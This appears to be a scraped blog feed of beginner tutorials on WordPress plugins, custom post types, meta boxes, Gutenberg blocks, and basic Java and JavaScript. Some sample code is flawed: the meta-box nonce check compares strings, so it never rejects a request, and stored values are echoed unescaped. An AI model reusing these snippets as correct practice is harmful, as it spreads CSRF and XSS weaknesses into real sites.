{return cfg;} EOF
How to Create a WordPress Plugin: A Step-by-Step Guide !
Creating a custom WordPress plugin allows you to add specific functionalities to your website, enhancing its features and tailoring it to your needs. In this step-by-step guide, we’ll walk you through the process of creating a simple WordPress plugin from scratch using code. Whether you’re a developer or just starting out, this guide will help you get started on the right track.
Understanding WordPress Plugins
A WordPress plugin is a piece of code that adds new features or functionalities to your WordPress website. Plugins can range from simple tasks like adding a contact form to complex features like e-commerce integration. Plugins allow you to extend the core functionality of WordPress without modifying its source code.
Setting Up Your Development Environment
To get started, you need a local development environment. You can use tools like XAMPP or WAMP to set up a server environment on your computer for testing and development.
Creating a Plugin Folder
In your WordPress installation directory, navigate to wp-content/plugins/.
Create a new folder for your plugin, naming it something descriptive and unique, like my-custom-plugin.
Understanding the Basic Structure
Inside your plugin folder, create a PHP file with the same name as your folder, such as my-custom-plugin.php. This file will serve as the main entry point for your plugin.
Adding Plugin Information and Header
In your main plugin file, start by adding a plugin header with essential information:
/*
Plugin Name: My Custom Plugin
Description: Add custom functionality to your WordPress site.
Version: 1.0
Author: Your Name
*/
Writing Your First Function
Let’s create a simple function that displays a welcome message on your website:
function custom_welcome_message() {
echo '<p>Welcome to my website! Thanks for visiting.</p>';
}
Using WordPress Hooks and Filters
To display our welcome message, we’ll use a WordPress hook. Add this line below your function to hook it into the content area of your website:
add_action('wp_footer', 'custom_welcome_message');
Now, when you refresh your website, you should see the welcome message at the bottom of the page.
Activating Your Plugin
In your WordPress admin dashboard, go to “Plugins” and activate your custom plugin. You should immediately see the welcome message on your website.
Debugging and Troubleshooting
During development, you might encounter errors or unexpected behavior. Use the built-in debugging tools in WordPress (WP_DEBUG) to identify and fix issues.
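For example, enabling debug logging in wp-config.php is a quick way to surface notices and errors while you work on the plugin; the values below are a common development setup, not something to leave enabled in production:
// In wp-config.php: enable debugging while developing.
define( 'WP_DEBUG', true );           // Turn on debug mode
define( 'WP_DEBUG_LOG', true );       // Write notices and errors to wp-content/debug.log
define( 'WP_DEBUG_DISPLAY', false );  // Keep errors out of the page output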
Adding Admin Menus and Pages
You can create admin menus and pages for your plugin to provide a user interface. For example, let’s create an admin page that displays a settings form:
function custom_plugin_menu() {
add_menu_page('Custom Plugin Settings', 'Custom Plugin', 'manage_options', 'custom-plugin', 'custom_plugin_settings_page');
}
function custom_plugin_settings_page() {
echo '<div class="wrap">
<h2>Custom Plugin Settings</h2>
<form method="post" action="options.php">
<!-- Your form fields here -->
</form>
</div>';
}
add_action('admin_menu', 'custom_plugin_menu');
Creating Shortcodes
Shortcodes allow users to add custom functionality to their posts or pages. Let’s create a shortcode that displays a special message:
function custom_shortcode() {
return '<p class="txt">This is a special message from my plugin!</p>';
}
add_shortcode('custom_message', 'custom_shortcode');
Now users can use the shortcode [custom_message] in their content to display the message.
Enqueuing Stylesheets and Scripts
You can style your plugin by enqueuing CSS and JavaScript files. Create a directory named css within your plugin folder and add a style.css file:
function enqueue_custom_styles() {
wp_enqueue_style('custom-style', plugins_url('css/style.css', __FILE__));
}
add_action('wp_enqueue_scripts', 'enqueue_custom_styles');
Adding Custom CSS
In your style.css file, you can add custom styles for your plugin’s elements:
/* Your custom styles here */
.txt{
background:#fff;
text-align:center;
}
Conclusion
Creating a WordPress plugin from scratch is a rewarding experience that empowers you to enhance your website’s functionality. With this guide, you’ve learned the basics of creating a plugin, adding functionalities, testing, and styling. Now you can continue exploring and building more advanced plugins to take your WordPress site to the next level.
Program to Check if String is Palindrome.
Checking whether a string is a palindrome is a common operation in Java programming. It is useful in various scenarios, such as validating user input or solving string-manipulation problems. In the following sections, we will explore an efficient approach to accomplish this task.
Initializing the String
Before we begin counting the characters, we need to have a string to work with. In Java, you can initialize a string using the String class.
String str = "madam";
Using the length() Method
The length() method provided by the String class returns the number of characters in the string. In the palindrome check, we use it to set the index of the last character.
str.length();
Using Two Pointers to Check Whether the String is a Palindrome
To check whether the string is a palindrome, we compare characters from both ends of the string and move towards the middle. If any pair of characters does not match, the string is not a palindrome.
str = str.toLowerCase(); // Convert the string to lowercase for case-insensitive comparison
int left = 0;
int right = str.length() - 1;
while (left < right) {
if (str.charAt(left) != str.charAt(right)) {
return false;
}
left++;
right--;
}
Performance Considerations
When checking whether a string is a palindrome, it's worth considering performance. The length() method has a time complexity of O(1) as it directly returns the length, while the two-pointer comparison runs in O(n) time because it compares at most n/2 character pairs, using O(1) extra space.
Sample code
public class StringIsPalindrome {
public static void main(String[] args) {
String input = "madam"; // Example input string
if (isPalindrome(input)) {
System.out.println("The string is a palindrome.");
} else {
System.out.println("The string is not a palindrome.");
}
}
public static boolean isPalindrome(String str) {
str = str.toLowerCase(); // Convert the string to lowercase for case-insensitive comparison
int left = 0;
int right = str.length() - 1;
while (left < right) {
if (str.charAt(left) != str.charAt(right)) {
return false;
}
left++;
right--;
}
return true;
}
}
In this program, we have directly assigned a string to the input variable for demonstration purposes. You can modify the value of input to test different strings. The isPalindrome function is the same as in the previous example, which checks whether the string is a palindrome or not. After calling the function, the program prints the appropriate message based on the result.
Remember to replace the input variable with the string you want to check for palindrome property.
Custom Post Type with WP Meta Box: A Comprehensive Guide!
In today’s digital world, creating custom post types is a common practice among website developers and content creators. WordPress, being a popular content management system, provides a powerful tool called WP Meta Box that allows developers to add custom fields and meta boxes to their custom post types. In this article, we will explore the concept of custom post types and delve into the functionalities and benefits of using WP Meta Box. So let’s dive in!
What are Custom Post Types and their uses ?
Custom post types are a feature of WordPress that enables you to create and manage different types of content beyond the traditional posts and pages. With custom post types, you can define your own content structures, such as portfolios, testimonials, products, events, and more. It allows you to organize and present your content in a structured manner, tailored to your specific needs. Using custom post types offers several advantages. It helps in better organization and management of diverse content types, improves user experience by providing targeted templates and layouts, and enhances the overall flexibility of your website. Custom post types also contribute to better search engine optimization (SEO) and allow you to extend the functionality of your WordPress site beyond its core capabilities.
WP Meta Box installation and Setup
WP Meta Box is a powerful WordPress plugin that simplifies the process of creating custom post types, custom fields, and meta boxes. It provides a user-friendly interface and a comprehensive set of features to manage and display custom fields in the WordPress admin area. WP Meta Box is widely adopted by developers and is known for its flexibility, extensibility, and compatibility with other popular plugins and themes. To get started with WP Meta Box, you need to install and activate the plugin, or you can use WordPress hooks to create a meta box yourself. The steps further below show sample code that registers a custom post type and adds a meta box with hooks.
Creating Custom Post Types with WP Meta Box
With WP Meta Box, creating custom post types is a straightforward process. Let’s go through the steps to create a custom post type:
1. Access the WP Meta Box settings in the WordPress admin menu.
2. Click on “Custom Post Types” to create a new post type.
3. Provide a name, labels, and other settings for your custom post type.
4. Save the settings, and your custom post type is ready to use.
You can further customize the post type by specifying the available fields, taxonomies, and other options according to your requirements.
Adding Custom Fields and Meta Boxes
WP Meta Box allows you to add custom fields and meta boxes to your custom post types effortlessly.
Displaying Custom Fields and Meta Boxes
Once you have added custom fields and meta boxes to your custom post types, you may want to display them on the front end of your website. WP Meta Box provides various methods to achieve this, including shortcode, template functions, and block editor integration. You can choose the most suitable approach based on your development workflow and requirements.
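As a rough illustration, assuming a meta value saved under the myposttype_year key used in the steps below, a theme template could output it like this:
// In a theme template (e.g. single-myposttype.php): print a saved meta value.
$year = get_post_meta( get_the_ID(), 'myposttype_year', true );
if ( ! empty( $year ) ) {
    echo '<p>Year: ' . esc_html( $year ) . '</p>';
}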
To get started with WP Meta Box and a custom post type, follow the steps below.
Step 1: Define your custom post type
To define your custom post type, you need to use the register_post_type() function. Here’s an example of how to create a custom post type for a myposttype:
function create_my_post_type() {
$args = array(
'labels' => array(
'name' => __( 'My Post type' ),
'singular_name' => __( 'My Post Type' ),
),
'public' => true,
'has_archive' => true,
'rewrite' => array( 'slug' => 'myposttype' ),
'menu_icon' => 'dashicons-portfolio',
'supports' => array( 'title', 'editor', 'thumbnail' ),
);
register_post_type( 'myposttype', $args );
}
add_action( 'init', 'create_my_post_type' );
Step 2: Create custom meta boxes
If you want to add custom fields to your custom post type, you can use the add_meta_box() function. Here’s an example of how to create a meta box for a myposttype:
function add_myposttype_metaboxes() {
add_meta_box(
'myposttype_meta',
'Myposttype Details',
'myposttype_meta_callback',
'myposttype',
'normal',
'default'
);
}
add_action( 'add_meta_boxes', 'add_myposttype_metaboxes' );
function myposttype_meta_callback( $post ) {
wp_nonce_field( basename( __FILE__ ), 'myposttype_nonce' );
$myposttype_meta = get_post_meta( $post->ID );
?>
<label for="myposttype_year"><?php _e( 'Year' ); ?></label>
<input type="text" name="myposttype_year" id="myposttype_year" value="<?php if ( isset ( $myposttype_meta['myposttype_year'] ) ) echo $myposttype_meta['myposttype_year'][0]; ?>" />
<?php
}
Step 3: Save custom meta box data
To save the custom meta box data, you need to use the save_post hook. Here’s an example of how to save the myposttype year meta box data:
function save_myposttype_meta( $post_id ) {
// Checks save status
$is_autosave = wp_is_post_autosave( $post_id );
$is_revision = wp_is_post_revision( $post_id );
$is_valid_nonce = ( isset( $_POST['myposttype_nonce'] ) && wp_verify_nonce( $_POST['myposttype_nonce'], basename( __FILE__ ) ) ) ? 'true' : 'false';
// Exits script depending on save status
if ( $is_autosave || $is_revision || !$is_valid_nonce ) {
return;
}
// Checks for input and sanitizes/saves if needed
if( isset( $_POST['myposttype_year'] ) ) {
update_post_meta( $post_id, 'myposttype_year', sanitize_text_field( $_POST['myposttype_year'] ) );
}
}
add_action( 'save_post', 'save_myposttype_meta' );
Step 4: Display custom post type on the front-end
To display your custom post type on the front-end of your site, you need to use a custom query. Here’s an example of how to display a list of myposttype items:
$args = array(
'post_type' => 'myposttype',
'posts_per_page' => 10,
);
$query = new WP_Query( $args );
if ( $query->have_posts() ) :
    while ( $query->have_posts() ) : $query->the_post();
        echo '<h1>' . get_the_title() . '</h1>';
        echo '<p>' . get_the_content() . '</p>';
    endwhile;
    wp_reset_postdata();
endif;
Best Practices for Custom Post Types
When working with custom post types and WP Meta Box, it’s essential to follow best practices to ensure optimal performance and maintainability. Here are some guidelines to keep in mind:
1. Plan your content structure and taxonomy hierarchy before creating custom post types.
2. Use descriptive names and labels for your post types, fields, and meta boxes.
3. Keep your code organized and modular by utilizing reusable functions and classes.
4. Regularly update and maintain your custom post types and WP Meta Box plugin.
5. Test your custom post types thoroughly across different devices and browsers.
By adhering to these best practices, you can create robust and future-proof custom post types.
Compatibility and Integration
WP Meta Box is designed to seamlessly integrate with other popular WordPress plugins and themes. It offers compatibility with plugins like Advanced Custom Fields (ACF), Yoast SEO, and WooCommerce. You can leverage this integration to extend the functionality of your custom post types and create more versatile and engaging websites.
Gutenberg Block Development with WordPress Hooks !
WordPress has revolutionized the way we create and manage websites, making it more accessible and user-friendly for everyone. One of the key features that has contributed to this revolution is Gutenberg, the block editor introduced in WordPress 5.0. With Gutenberg, developers have the ability to create custom blocks and extend the functionality of their websites using WordPress hooks. In this article, we will explore Gutenberg block development using WordPress hooks and delve into the power and flexibility it offers to WordPress developers.
Gutenberg blocks are the building blocks of content in the WordPress block editor. Each block represents a specific piece of content or functionality that can be added to a post or page. With Gutenberg, developers can create custom blocks that cater to their specific needs, allowing them to extend the capabilities of the editor beyond the default set of blocks provided by WordPress.
Understanding WordPress Hooks
WordPress hooks are a powerful mechanism that allows developers to modify or extend the behavior of WordPress core, themes, and plugins. Hooks are divided into two types: actions and filters. Actions are events triggered at specific points in the WordPress execution flow, while filters allow developers to modify data before it is displayed or saved.
Creating a Custom Gutenberg Block
To create a custom Gutenberg block, we need to define a block type using JavaScript. This involves registering the block, specifying its attributes, rendering its content, and adding any necessary editor controls. By following the Gutenberg block development documentation, developers can easily create custom blocks tailored to their specific requirements.
Registering and Enqueuing Block Assets
Once the custom Gutenberg block is defined, we need to register and enqueue its assets. This includes JavaScript and CSS files that contain the block’s logic and styling. By properly enqueuing the assets, we ensure that they are loaded only when needed, minimizing the impact on page loading times and improving overall performance.
Adding Custom Attributes and Styles to Blocks
Custom attributes allow developers to store additional data for each instance of a block. By adding custom attributes, developers can make their blocks more dynamic and flexible. Additionally, custom styles can be applied to blocks to enhance their visual appearance and provide a better user experience.
Implementing Dynamic Block Content
Dynamic block content allows users to interact with blocks and update their content dynamically. By implementing dynamic block content, developers can create blocks that display dynamic data fetched from external sources or modified based on user input. This adds a layer of interactivity and makes the blocks more versatile.
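As a rough sketch of the idea (the block name my-plugin/latest-post and both function names are made up for illustration), a dynamic block registers a render_callback so its output is generated in PHP on every request:
// Register a dynamic block whose front-end output is rendered in PHP.
function myplugin_register_latest_post_block() {
    register_block_type( 'my-plugin/latest-post', array(
        'render_callback' => 'myplugin_render_latest_post_block',
    ) );
}
add_action( 'init', 'myplugin_register_latest_post_block' );

// Build the block output at request time, so it always shows fresh data.
function myplugin_render_latest_post_block( $attributes ) {
    $latest = get_posts( array( 'numberposts' => 1 ) );
    if ( empty( $latest ) ) {
        return '';
    }
    return '<p>Latest post: ' . esc_html( get_the_title( $latest[0] ) ) . '</p>';
}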
Extending Block Functionality with Hooks
WordPress hooks can be used to extend the functionality of Gutenberg blocks. Developers can hook into various actions and filters to modify block behavior, add custom controls, or perform additional actions based on user interactions. This flexibility allows developers to create highly customized and powerful blocks that cater to specific use cases.
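For instance, the core render_block filter lets PHP code adjust a block's front-end output; in this sketch the wrapper class name is an arbitrary example:
// Filter the rendered output of core paragraph blocks on the front end.
function myplugin_filter_paragraph_block( $block_content, $block ) {
    if ( 'core/paragraph' === $block['blockName'] ) {
        $block_content = '<div class="my-paragraph-wrapper">' . $block_content . '</div>';
    }
    return $block_content;
}
add_filter( 'render_block', 'myplugin_filter_paragraph_block', 10, 2 );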
Enhancing Block Editor Experience
To provide a seamless editing experience for users, it’s essential to enhance the block editor with additional features. This can include adding custom meta boxes, integrating with third-party APIs, or implementing keyboard shortcuts. By enhancing the block editor experience, developers can improve productivity and streamline the content creation process.
Testing and Debugging Gutenberg Blocks
Thorough testing and debugging are crucial in Gutenberg block development. WordPress provides several tools and techniques for testing blocks, such as the Gutenberg plugin for WordPress, unit testing with Jest, and browser-based testing. Proper testing ensures that the blocks work as expected and minimizes the chances of encountering issues in a production environment.
To create a custom Gutenberg block in WordPress, follow these steps:
• Create a new plugin or use an existing one where you can add your custom block code.
• Enqueue the necessary scripts and stylesheets for Gutenberg block development in your plugin file using the enqueue_block_editor_assets hook. This will make sure that your block is properly styled and has access to the necessary functionality.
• Define your custom block using the registerBlockType function. This function takes an object as its argument, which defines the block’s attributes, such as its name, icon, category, and edit and save functions.
• In the edit function, use React to create the block’s user interface. This is where you’ll define the markup and behavior of your block.
• In the save function, define how the block’s content should be saved to the database. This function should return the markup that was generated in the edit function.
// In the main plugin file (PHP): enqueue the block's editor script.
function my_custom_block_assets() {
    wp_enqueue_script(
        'my-custom-block',
        plugin_dir_url( __FILE__ ) . 'block.js',
        array( 'wp-blocks', 'wp-element', 'wp-block-editor' ),
        '1.0',
        true
    );
}
add_action( 'enqueue_block_editor_assets', 'my_custom_block_assets' );
// Note: a dynamic (server-rendered) block would also call register_block_type()
// here with a 'render_callback'. This example is a static block, so the block is
// registered in JavaScript and its markup is saved directly into the post content.

// In block.js (JavaScript): register the block and define its edit and save functions.
( function ( blocks, blockEditor, element ) {
    var el = element.createElement;
    var RichText = blockEditor.RichText;

    blocks.registerBlockType( 'my-plugin/my-custom-block', {
        title: 'My Custom Block',
        icon: 'smiley',
        category: 'widgets',
        attributes: {
            content: {
                type: 'string',
                source: 'html',
                selector: '.my-custom-block',
            },
        },
        // The edit function builds the block's interface inside the editor.
        edit: function ( props ) {
            return el( 'div', { className: props.className },
                el( 'h2', null, 'My Custom Block' ),
                el( 'p', null, 'Edit the content here:' ),
                el( RichText, {
                    tagName: 'div',
                    className: 'my-custom-block',
                    value: props.attributes.content,
                    onChange: function ( content ) {
                        props.setAttributes( { content: content } );
                    },
                } )
            );
        },
        // The save function returns the markup that is stored in the post content.
        save: function ( props ) {
            return el( 'div', {},
                el( RichText.Content, {
                    tagName: 'div',
                    className: 'my-custom-block',
                    value: props.attributes.content,
                } )
            );
        },
    } );
} )( window.wp.blocks, window.wp.blockEditor, window.wp.element );
Conclusion
Gutenberg block development using WordPress hooks provides developers with the ability to create custom blocks that extend the functionality of the WordPress block editor. By leveraging WordPress hooks, developers can add dynamic content, enhance block functionality, and provide a better editing experience for users. With the power and flexibility of Gutenberg and WordPress hooks, the possibilities for creating unique and interactive websites are endless.
Program to Count the Total Number of Characters in a given String.
Counting the total number of characters in a string is a common operation in Java programming. It helps in various scenarios, such as determining the length of a user input or validating the input length against certain criteria. In the following sections, we will explore different approaches to accomplish this task efficiently.
Initializing the String
Before we begin counting the characters, we need to have a string to work with. In Java, you can initialize a string using the String class.
String str= "Count Total Characters";
Using the length() Method
The simplest way to count the characters in a string is by using the length() method provided by the String class. This method returns the number of characters in the string.
str.length();
Using a Loop to Count Characters
Another approach to count the characters in a string is by using a loop. We can iterate over each character in the string and increment a counter variable.
for(int i=0;i<str.length();i++) {
if(str.charAt(i)!=' ' ) {
count++;
}
}
Performance Considerations
When counting characters in a string, it’s important to consider performance. The length() method has a time complexity of O(1) as it directly returns the length. However, using a loop to count characters has a time complexity of O(n) since it iterates over each character.
Sample code
public class CountCharacters{
public static void main(String[] args) {
String str= "Count Total Characters";
int count= 0;
System.out.println("Length of String is " + str.length());
for(int i=0;i<str.length();i++) {
if(str.charAt(i)!=' ' ) {
count++;
}
}
System.out.println("Count of characters: " + count);
}
}
Output :
Length of String is 22
Count of characters: 20
Conclusion
Counting the total number of characters in a given string is a fundamental task in Java programming. In this article, we explored various approaches to accomplish this task efficiently, including using the length() method, loops and count the no of characters.
Remember to consider the performance implications of each approach and choose the one that best suits your specific requirements.
How to Call JavaScript Functions: A Comprehensive Guide
JavaScript is a powerful programming language that allows developers to add interactivity and dynamic behavior to web pages. One of the fundamental concepts in JavaScript is the ability to call functions. In this article, we will explore the various ways to call JavaScript functions and provide you with a step-by-step guide. Whether you are a beginner or an experienced developer, this article will help you understand the different techniques and best practices for calling JavaScript functions effectively.
JavaScript functions are blocks of reusable code that perform specific tasks. They allow you to organize your code, make it modular, and promote code reuse. Calling a function means executing the code within the function body at a specific point in your program.
Calling Functions with Parentheses
function test(){
var x=10;
console.log(x);
}
test(); // Calling the function
By including parentheses after the function name, you invoke the function and execute its code.
Passing Arguments to Functions
JavaScript functions can also accept parameters or arguments. Arguments are values that you can pass to a function to customize its behavior. You can pass arguments by including them within the parentheses when calling the function. Here’s an example:
function test(name) {
console.log("Hi, " + name);
}
test("techintricks"); // Calling the function with an argument
In this example, the test function accepts a name parameter, which is then used to personalize the greeting.
Returning Values from Functions
Functions in JavaScript can also return values. You can use the return statement to specify the value that the function should produce. Here’s an example:
function test(x,y){
let z=x+y;
return z;
}
let addition=test(1,2); // Calling the function and storing the result
console.log(addition);//output 3
In this example, the test function returns the sum of two numbers, which is then stored in the addition variable.
Calling Functions as Event Handlers
JavaScript functions are often used as event handlers to respond to user interactions. You can assign a function to an event, such as a button click, and the function will be called when the event occurs. Here’s an example:
<button onclick="test()">Click me</button>
In this example, the test function will be called when the button is clicked.
Calling Functions using Arrow Functions
Arrow functions are a concise syntax for writing JavaScript functions. They provide a more compact way to define functions and have some differences in how they handle the this keyword. Here’s an example:
let sayHello = () => {
console.log("Hello, World!");
};
sayHello(); // Calling the arrow function
Arrow functions are particularly useful when working with callback functions or when you want to preserve the value of this from the surrounding context.
Asynchronous Function Calls
JavaScript supports asynchronous programming, where functions can be called asynchronously and continue execution without waiting for the result. Asynchronous function calls are commonly used when dealing with network requests, timers, or other time-consuming operations. Promises and async/await are popular techniques for handling asynchronous calls in JavaScript.
Error Handling and Exception Handling
When calling JavaScript functions, it’s essential to handle errors and exceptions gracefully. You can use try-catch blocks to catch and handle exceptions that may occur during function execution. Error handling ensures that your program continues to run smoothly even in the presence of unexpected errors.
Best Practices for Calling JavaScript Functions
To ensure clean and maintainable code, it’s essential to follow some best practices when calling JavaScript functions. These include giving meaningful names to functions, avoiding excessive nesting, and keeping your functions small and focused.
Conclusion
In conclusion, calling JavaScript functions is a fundamental concept that allows you to execute code and perform specific tasks. By understanding the various techniques and best practices for calling functions, you can write more efficient and maintainable JavaScript code. Remember to use parentheses, pass arguments, and handle return values appropriately. Additionally, explore advanced topics like asynchronous function calls and error handling to enhance your JavaScript skills.
A Beginner’s Guide to Create an Custom Post Type in WordPress !
WordPress is a popular content management system that allows users to create and manage websites with ease. One of the key features of WordPress is the ability to create custom post types, which enable you to organize and display different types of content on your website. In this beginner’s guide, we will walk you through the process of creating a custom post type in WordPress, step by step.
What is custom post type ?
Custom Post type is a post type where we can create our own post type according to requirement. Once a custom post type is registered, it gets a new top-level administrative screen that can be used to make changes in posts of that type.
Why we need Custom Post Type ?
To add additional functionality to our website. Once created , we can modify functionality of our website easily. Lets Understand with simple example.
Ex :- Suppose , We have resturant website and wants to add two different menu like menu-1 , menu-2. How can we add ?
Using wordpress default post we can create menu-1 easily but for menu-2 we have create another wordpress post type that is called as custom post type in which we can add more fields for more data.
Planning Your Custom Post Type
Before jumping into creating a custom post type, it’s essential to plan its structure and functionality. Consider the purpose of your post type, the specific data you want to collect, and how you want to display it on your website. This planning phase will help you define the parameters and settings required for your custom post type.
Registering the Custom Post Type
To create a custom post type, you need to register it with WordPress. This can be done by adding code to your theme’s functions.php file or by using a custom plugin. The registration process involves defining the labels, settings, and capabilities of your post type. Once registered, your custom post type will appear in the WordPress admin dashboard.
Customizing the Custom Post Type
After registering your custom post type, you can further customize its behavior and appearance. This includes modifying labels, adding support for specific features like thumbnails or comments, and setting up the post type’s capabilities and permissions. Customizing your custom post type ensures that it functions exactly as intended.
Displaying the Custom Post Type
Once you’ve created and customized your custom post type, you’ll want to display it on your website. This can be achieved by creating custom templates or modifying existing ones to accommodate the new post type. You can also utilize plugins and theme builders that provide easy-to-use interfaces for displaying custom post types.
Adding Custom Fields to the Custom Post Type
Custom fields allow you to collect additional data for your custom post type. They can be used to gather information such as author details, event dates, or product specifications. WordPress provides built-in support for custom fields, and you can also use plugins to enhance the functionality and appearance of your custom fields.
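As a hedged example, you can register a meta field for a post type so it is handled consistently and optionally exposed to the REST API; the cook_time key below is invented for illustration and assumes the recipe post type registered later in this guide:
// Register a 'cook_time' field for the recipe post type.
// Add 'custom-fields' to the post type's supports array if you want it editable in the editor.
function myplugin_register_recipe_meta() {
    register_post_meta( 'recipe', 'cook_time', array(
        'type'         => 'string',
        'single'       => true,
        'show_in_rest' => true,
    ) );
}
add_action( 'init', 'myplugin_register_recipe_meta' );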
Implementing Taxonomies
Taxonomies are used to classify and organize content within your custom post type. They enable you to create hierarchical or non-hierarchical structures such as categories and tags. By implementing taxonomies, you can enhance the usability and discoverability of your content, making it easier for users to navigate your website.
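A minimal sketch of registering a custom taxonomy might look like this; the cuisine taxonomy is only an example, attached to the recipe post type registered later in this guide:
// Register a hierarchical 'cuisine' taxonomy and attach it to recipes.
function myplugin_register_cuisine_taxonomy() {
    register_taxonomy( 'cuisine', array( 'recipe' ), array(
        'label'        => __( 'Cuisines' ),
        'hierarchical' => true,
        'show_in_rest' => true,
        'rewrite'      => array( 'slug' => 'cuisine' ),
    ) );
}
add_action( 'init', 'myplugin_register_cuisine_taxonomy' );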
Enabling Custom Post Type Archives
Archives allow you to display a list of all posts belonging to a specific custom post type. Enabling archives for your custom post type ensures that visitors can access and browse through your content efficiently. You can customize the archive template and use plugins to enhance the archive functionality with filtering and sorting options.
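If you need to adjust what the archive shows, for example how many posts appear per page, the pre_get_posts hook is a common approach; this sketch assumes the recipe post type registered later in this guide:
// Show 12 recipes per page on the recipe archive, front end only.
function myplugin_recipe_archive_query( $query ) {
    if ( ! is_admin() && $query->is_main_query() && is_post_type_archive( 'recipe' ) ) {
        $query->set( 'posts_per_page', 12 );
    }
}
add_action( 'pre_get_posts', 'myplugin_recipe_archive_query' );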
Customizing the Single Post View
The single post view is the page that displays an individual post of your custom post type. You can customize this view to match the design and layout of your website. By modifying the single post template, you can showcase the unique attributes of your custom post type and provide an engaging reading experience for your visitors.
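For example, a theme can provide a single-recipe.php file to control the single view of the recipe post type; a bare-bones sketch might look like this:
<?php
// single-recipe.php: minimal single view for the recipe post type.
get_header();

while ( have_posts() ) : the_post();
    the_title( '<h1>', '</h1>' );
    the_post_thumbnail( 'large' );
    the_content();
endwhile;

get_footer();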
Adding Custom Post Type Templates
In addition to customizing the single post view, you can create custom templates for other views related to your custom post type. These include the archive template, search results template, and category template. By designing these templates, you can ensure a consistent and cohesive presentation of your custom post type throughout your website.
Applying Styling to the Custom Post Type
To create a visually appealing custom post type, you can apply custom styles using CSS. By targeting the elements specific to your post type, you can modify their appearance, layout, and typography. This allows you to integrate your custom post type seamlessly with the overall design of your website and maintain a consistent visual identity.
Managing Custom Post Type Permalinks
Permalinks are the URLs that point to individual posts of your custom post type. It’s important to set up proper permalink structure for your custom post type to ensure search engine friendliness and user-friendly URLs. WordPress provides options to customize the permalinks and ensure they are easy to read and remember.
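One practical note, shown here as a sketch with placeholder function names: after registering a post type with a new rewrite slug, the rewrite rules must be flushed once so the new permalinks resolve. If the post type is registered from a plugin, this is usually done on activation:
// Flush rewrite rules once on plugin activation, never on every request.
function myplugin_activate() {
    myplugin_register_post_type(); // hypothetical function that calls register_post_type()
    flush_rewrite_rules();
}
register_activation_hook( __FILE__, 'myplugin_activate' );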
Troubleshooting Common Issues
While creating a custom post type, you may encounter certain issues or errors. These could range from incorrect template rendering to conflicts with other plugins or themes. Troubleshooting common issues involves identifying the problem, debugging the code, and seeking help from the WordPress community or support forums.
Steps to create a Custom Post Type in WordPress
• Navigate to your theme folder, open the functions.php file, and add the code below. If you are using a child theme, you can follow the same procedure.
function wpdocs_kantbtrue_init() {
$labels = array(
'name' => _x( 'Recipes', 'Post type general name', 'recipe' ),
'singular_name' => _x( 'Recipe', 'Post type singular name', 'recipe' ),
'menu_name' => _x( 'Recipes', 'Admin Menu text', 'recipe' ),
'name_admin_bar' => _x( 'Recipe', 'Add New on Toolbar', 'recipe' ),
'add_new' => __( 'Add New', 'recipe' ),
'add_new_item' => __( 'Add New recipe', 'recipe' ),
'new_item' => __( 'New recipe', 'recipe' ),
'edit_item' => __( 'Edit recipe', 'recipe' ),
'view_item' => __( 'View recipe', 'recipe' ),
'all_items' => __( 'All recipes', 'recipe' ),
'search_items' => __( 'Search recipes', 'recipe' ),
'parent_item_colon' => __( 'Parent recipes:', 'recipe' ),
'not_found' => __( 'No recipes found.', 'recipe' ),
'not_found_in_trash' => __( 'No recipes found in Trash.', 'recipe' ),
'featured_image' => _x( 'Recipe Cover Image', 'Overrides the “Featured Image” phrase for this post type. Added in 4.3', 'recipe' ),
'set_featured_image' => _x( 'Set cover image', 'Overrides the “Set featured image” phrase for this post type. Added in 4.3', 'recipe' ),
'remove_featured_image' => _x( 'Remove cover image', 'Overrides the “Remove featured image” phrase for this post type. Added in 4.3', 'recipe' ),
'use_featured_image' => _x( 'Use as cover image', 'Overrides the “Use as featured image” phrase for this post type. Added in 4.3', 'recipe' ),
'archives' => _x( 'Recipe archives', 'The post type archive label used in nav menus. Default “Post Archives”. Added in 4.4', 'recipe' ),
'insert_into_item' => _x( 'Insert into recipe', 'Overrides the “Insert into post”/”Insert into page” phrase (used when inserting media into a post). Added in 4.4', 'recipe' ),
'uploaded_to_this_item' => _x( 'Uploaded to this recipe', 'Overrides the “Uploaded to this post”/”Uploaded to this page” phrase (used when viewing media attached to a post). Added in 4.4', 'recipe' ),
'filter_items_list' => _x( 'Filter recipes list', 'Screen reader text for the filter links heading on the post type listing screen. Default “Filter posts list”/”Filter pages list”. Added in 4.4', 'recipe' ),
'items_list_navigation' => _x( 'Recipes list navigation', 'Screen reader text for the pagination heading on the post type listing screen. Default “Posts list navigation”/”Pages list navigation”. Added in 4.4', 'recipe' ),
'items_list' => _x( 'Recipes list', 'Screen reader text for the items list heading on the post type listing screen. Default “Posts list”/”Pages list”. Added in 4.4', 'recipe' ),
);
$args = array(
'labels' => $labels,
'description' => 'Recipe custom post type.',
'public' => true,
'publicly_queryable' => true,
'show_ui' => true,
'show_in_menu' => true,
'query_var' => true,
'rewrite' => array( 'slug' => 'recipe' ),
'capability_type' => 'post',
'has_archive' => true,
'hierarchical' => false,
'menu_position' => 20,
'supports' => array( 'title', 'editor', 'author', 'thumbnail' ),
'taxonomies' => array( 'category', 'post_tag' ),
'show_in_rest' => true
);
register_post_type( 'recipe', $args ); // post type keys should be lowercase and no more than 20 characters
}
add_action( 'init', 'wpdocs_kantbtrue_init' );
Conclusion
Creating a custom post type in WordPress opens up endless possibilities for organizing and presenting your content. By following the steps outlined in this beginner’s guide, you can confidently create your own custom post type, tailor-made to suit your website’s unique requirements. Embrace the flexibility and power of WordPress, and enjoy the enhanced functionality and user experience that custom post types bring.
Get Started with WordPress REST API: A Complete Guide using WP Hooks
WordPress has come a long way from being a simple blogging platform to a versatile content management system (CMS) that powers millions of websites across the globe. One of the powerful features it offers is the WordPress REST API, which allows developers to interact with the platform programmatically and build innovative applications. In this comprehensive guide, we’ll dive into the world of WordPress REST API, focusing on how to leverage its capabilities using WP hooks.
Making WordPress REST API Work for You
The WordPress REST API opens up a world of possibilities for developers to create dynamic and interactive websites, applications, and services. By harnessing the power of WP hooks, you can seamlessly integrate custom functionality into your WordPress site and craft a unique user experience. Whether you’re a seasoned developer or just starting, the REST API provides a flexible foundation for building innovative solutions that push the boundaries of what’s possible.
Benefits of Using WP Hooks with REST API
Integrating WP Hooks with the REST API opens up a world of possibilities for extending WordPress functionality. It enables developers to create custom endpoints, manipulate responses, and enhance user experience without compromising security or stability.
Setting Up Your Environment
Before diving into using WP Hooks with the REST API, it’s important to have a development environment ready. You can set up a local server using tools like XAMPP or use online platforms like WPEngine for testing.
Making API Requests with WP Hooks
